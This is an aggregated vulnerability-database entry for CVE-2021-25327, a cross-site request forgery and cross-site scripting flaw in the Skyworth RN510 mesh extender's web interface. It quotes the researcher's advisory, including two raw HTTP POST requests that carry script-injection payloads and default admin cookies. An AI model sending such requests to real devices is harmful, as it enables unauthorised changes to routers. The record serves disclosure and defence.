ID

VAR-202104-1682


CVE

CVE-2021-25327


TITLE

Skyworth Digital Technology RN510  Cross-site request forgery vulnerability in

Trust: 0.8

sources: JVNDB: JVNDB-2021-010305

DESCRIPTION

Skyworth Digital Technology RN510 V.3.1.0.4 contains a cross-site request forgery (CSRF) vulnerability in /cgi-bin/net-routeadd.asp and /cgi-bin/sec-urlfilter.asp. Missing CSRF protection in devices can lead to XSRF, as the above pages are vulnerable to cross-site scripting (XSS). RN510 is a dual-band wireless AC2100 access point launched by Skyworth Digital Technology. No detailed vulnerability details are currently provided. Overview ======== Title:- Authenticated XSRF in RN510 Mesh Extender. CVE-ID :- CVE-2021-25327 Author: Kaustubh G. Padwad Vendor: Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products) Products: 1. RN510 with firmware V.3.1.0.4 (Tested and verified) Potential 2.RN620 with respective firmware or below 3.RN410 With Respective firmwware or below. Integrated with two gigabit LAN ports, and a dual-band AP which supports 2x2 802.11n(300Mbps) and 4x4 802.11ac (1733Mbps) concurrently, RN510provides a stable & reliable high speed wired and wireless connectivity for home user and SOHO users. Utilizing state of art EasyMesh solution, two or more RN510 units could be easily teamed upwith Skyworth ONT gateway (e.g. GN543) and form an automatically organized network. RN510 could support either wired line backhaul or wireless backhaul to other mesh node. User could enjoy a wonderful zero-touch, robust and failure auto recovery, seamless connected wireless home networking experience. RN510 uses a system of units to achieve seamless whole-home Wi-Fi coverage, eliminate weak signal areas once and for all. RN510 work together to form a unified network with a single network name. Devices automatically switch between RN510s as you move through your home for the fastest possible speeds. A RN510 Dual-pack delivers Wi-Fi to an area of up to 2,800 square feet. And if that’s not enough, simply add more RN510 to the network anytime to increase coverage. RN510 provides fast and stable connections with speeds of up to 2100 Mbps and works with major internet service provider (ISP) and modem. Parental Controls limits online time and block inappropriate websites according to unique profiles created for each family member. Setup is easier than ever with the Skywifi app there to walk you through every step. Description: ============ An issue was discovered on Shenzhen Skyworth The value of DestIPAdderss under /cgi-bin/net-routeadd.asp is not properly sanatizing hence it allow to execute malicious javascript, which result a successful cross site scripting in /cgi-bin/net-routeadd.asp, Additionally value of urlitem under /cgi-bin/sec-urlfilter.asp is also not getting properly sanitize hence it will result to successful cross site scripting. Since device dont have CSRF valdation it is possible to perform the XSRF by using CSRF + XSS vulnerability. Additional Information ======================== Sample request -1 Request ======== POST /cgi-bin/net-routeadd.asp HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.2.1/cgi-bin/net-routeadd.asp Content-Type: application/x-www-form-urlencoded Content-Length: 235 Connection: close Cookie: UID=admin; PSW=admin; SESSIONID=boasid7a108566d118e9b5bd235b1412cb770c Upgrade-Insecure-Requests: 1 add_num=0&user_def_num=0&WanInterfaceFlag=br0&metricFlag=0&gwflag=Yes&ifflag=Yes&DestIPAddress=<svg><script ?>alert(document.cookie)&DestSubnetMask=255.255.255.255&gwStr=on&GatewayIPAddress=192.168.1.1&ifStr=on&Interface=br0&SaveFlag=1 Sample Request-2 POST /cgi-bin/sec-urlfilter.asp HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.2.1/cgi-bin/sec-urlfilter.asp Content-Type: application/x-www-form-urlencoded Content-Length: 162 Connection: close Cookie: UID=admin; PSW=admin; SESSIONID=boasid7a108566d118e9b5bd235b1412cb770c Upgrade-Insecure-Requests: 1 Save_Flag=1&Actionflag=Add&EnableUrlFilterFlag=1&delnum=&add_num=1&Url_num=1&enableFilter=on&FilterPolicy=0&urlitem=%3C%2Fscript%3E%3Csvg+onload%3Dalert%281%29%3E [Affected Component] IpAddr function on page /cgi-bin/app-staticIP.asp inside the boa web server implementation. ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Attack Vectors] An Authentiated attacker need to run set the cross site scripting payload at DestIPAddress,urlitem under /cgi-bin/net-routeadd.asp and /cgi-bin/sec-urlfilter.asp respectively in order to achive XSS. [Vulnerability Type] ==================== CSRF, XSS How to Reproduce: (POC): ======================== One can use below exploit Attacker needs to run above requests in order to achive to XSRF. Mitigation ========== [Vendor of Product] Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products) Disclosure: =========== 19-Jan-2021:- reported this to vendor 19-Jan-2021:- Requested for CVE-ID credits: ======== * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://s3curityb3ast.github.io/ * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad

Trust: 2.34

sources: NVD: CVE-2021-25327 // JVNDB: JVNDB-2021-010305 // CNVD: CNVD-2021-28368 // VULMON: CVE-2021-25327 // PACKETSTORM: 162454

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-28368

AFFECTED PRODUCTS

vendor:skyworthdigitalmodel:rn510scope:eqversion:3.1.0.4

Trust: 1.0

vendor:skyworth digital holdingsmodel:rn510scope:eqversion: -

Trust: 0.8

vendor:skyworth digital holdingsmodel:rn510scope:eqversion:rn510 firmware 3.1.0.4

Trust: 0.8

vendor:skyworthmodel:digital technology rn510scope:eqversion:v.3.1.0.4

Trust: 0.6

sources: CNVD: CNVD-2021-28368 // JVNDB: JVNDB-2021-010305 // NVD: CVE-2021-25327

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2021-25327
value: MEDIUM

Trust: 1.0

NVD: CVE-2021-25327
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2021-28368
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-202104-607
value: MEDIUM

Trust: 0.6

VULMON: CVE-2021-25327
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2021-25327
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2021-28368
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2021-25327
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: CVE-2021-25327
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-28368 // VULMON: CVE-2021-25327 // JVNDB: JVNDB-2021-010305 // CNNVD: CNNVD-202104-607 // NVD: CVE-2021-25327

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.0

problemtype:CWE-79

Trust: 1.0

problemtype:Cross-site request forgery (CWE-352) [NVD evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2021-010305 // NVD: CVE-2021-25327

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202104-607

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-202104-607

PATCH

title:Top Pageurl:https://en.skyworthdigital.com/

Trust: 0.8

title:Skyworth Digital Technology RN510 Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147345

Trust: 0.6

title:CVE-2021-25327url:https://github.com/GoogleProjectZer0/CVE-2021-25327

Trust: 0.1

sources: VULMON: CVE-2021-25327 // JVNDB: JVNDB-2021-010305 // CNNVD: CNNVD-202104-607

EXTERNAL IDS

db:NVDid:CVE-2021-25327

Trust: 4.0

db:PACKETSTORMid:162454

Trust: 2.6

db:JVNDBid:JVNDB-2021-010305

Trust: 0.8

db:CNVDid:CNVD-2021-28368

Trust: 0.6

db:CNNVDid:CNNVD-202104-607

Trust: 0.6

db:VULMONid:CVE-2021-25327

Trust: 0.1

sources: CNVD: CNVD-2021-28368 // VULMON: CVE-2021-25327 // JVNDB: JVNDB-2021-010305 // PACKETSTORM: 162454 // CNNVD: CNNVD-202104-607 // NVD: CVE-2021-25327

REFERENCES

url:http://packetstormsecurity.com/files/162454/shenzhen-skyworth-rn510-cross-site-request-forgery-cross-site-scripting.html

Trust: 3.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-25327

Trust: 2.1

url:https://s3curityb3ast.github.io/ksa-dev-012.md

Trust: 1.7

url:http://seclists.org/fulldisclosure/2021/may/6

Trust: 1.7

url:https://cwe.mitre.org/data/definitions/352.html

Trust: 0.1

url:https://github.com/googleprojectzer0/cve-2021-25327

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://twitter.com/s3curityb3ast

Trust: 0.1

url:https://www.linkedin.com/in/kaustubhpadwad

Trust: 0.1

url:https://s3curityb3ast.github.io/

Trust: 0.1

url:http://www.skyworthdigital.com/products)

Trust: 0.1

url:http://192.168.2.1/cgi-bin/net-routeadd.asp

Trust: 0.1

url:http://breakthesec.com

Trust: 0.1

url:http://192.168.2.1/cgi-bin/sec-urlfilter.asp

Trust: 0.1

sources: CNVD: CNVD-2021-28368 // VULMON: CVE-2021-25327 // JVNDB: JVNDB-2021-010305 // PACKETSTORM: 162454 // CNNVD: CNNVD-202104-607 // NVD: CVE-2021-25327

CREDITS

Kaustubh G. Padwad

Trust: 0.7

sources: PACKETSTORM: 162454 // CNNVD: CNNVD-202104-607

SOURCES

db:CNVDid:CNVD-2021-28368
db:VULMONid:CVE-2021-25327
db:JVNDBid:JVNDB-2021-010305
db:PACKETSTORMid:162454
db:CNNVDid:CNNVD-202104-607
db:NVDid:CVE-2021-25327

LAST UPDATE DATE

2024-11-23T22:05:08.770000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2021-28368date:2021-04-15T00:00:00
db:VULMONid:CVE-2021-25327date:2021-05-04T00:00:00
db:JVNDBid:JVNDB-2021-010305date:2022-06-29T04:53:00
db:CNNVDid:CNNVD-202104-607date:2022-07-14T00:00:00
db:NVDid:CVE-2021-25327date:2024-11-21T05:54:45.540

SOURCES RELEASE DATE

db:CNVDid:CNVD-2021-28368date:2021-04-15T00:00:00
db:VULMONid:CVE-2021-25327date:2021-04-09T00:00:00
db:JVNDBid:JVNDB-2021-010305date:2022-06-29T00:00:00
db:PACKETSTORMid:162454date:2021-05-04T19:16:42
db:CNNVDid:CNNVD-202104-607date:2021-04-09T00:00:00
db:NVDid:CVE-2021-25327date:2021-04-09T13:15:13.160